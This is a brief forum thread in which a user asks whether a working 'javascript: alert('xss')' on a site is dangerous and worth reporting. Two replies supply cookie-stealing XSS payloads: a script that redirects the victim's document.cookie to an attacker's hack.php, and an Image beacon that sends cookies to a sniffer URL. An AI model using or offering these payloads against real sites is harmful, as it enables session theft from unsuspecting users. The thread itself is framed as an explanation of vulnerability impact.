Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
N
N
Nimor2012-01-19 12:35:08
Information Security
Nimor, 2012-01-19 12:35:08

How to check XSS vulnerability?

Running: javascript: alert('xss')

Dangerous? Is it worth writing to support or will they send me?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
I
int03e, 2012-01-19
@int03e

Is it done in a GET request? We substitute instead of an alert

<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Where hack.php is our simple script for saving cookies. Sending a link, stealing cookies.

Report
[
[email protected]><e, 2012-01-19
@barmaley_exe

If you have alert('xss') executed, then some

var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;
Must be executed.

Similar questions
D
dm2015-05-29 13:19:38
The name of the Cyrillic font in the picture? 6Reply
B
blabs2016-08-27 17:48:22
How to restrict access to the database only from the IP of the server where the code itself is located? 1Reply
A
antoshka19912016-08-27 18:47:46
How to securely store private encryption keys on a flash drive? 2Reply
C
Chamalion2020-11-04 16:30:17
How to prevent digital fingerprinting in Google Chrome? 1Reply
D
Danil T.2022-03-21 16:24:08
Get a higher education in information security after college or go to work? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question